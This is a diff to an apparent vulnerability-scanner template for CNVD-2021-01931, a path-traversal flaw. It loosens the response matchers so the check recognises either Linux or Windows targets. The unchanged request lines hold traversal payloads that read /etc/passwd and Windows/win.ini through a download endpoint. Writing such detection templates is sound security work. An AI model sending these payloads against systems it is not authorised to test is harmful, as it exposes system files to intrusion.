--- a/cnvd/2021/CNVD-2021-01931.yaml
+++ b/cnvd/2021/CNVD-2021-01931.yaml
@@ -13,17 +13,17 @@ requests:
       - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
       - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
       
-    matchers-condition: and
+    matchers-condition: or
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0"
 
       - type: word
-        words:
-          - "for 16-bit app support"
         part: body
-
-      - type: status
-        status:
-          - 200
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
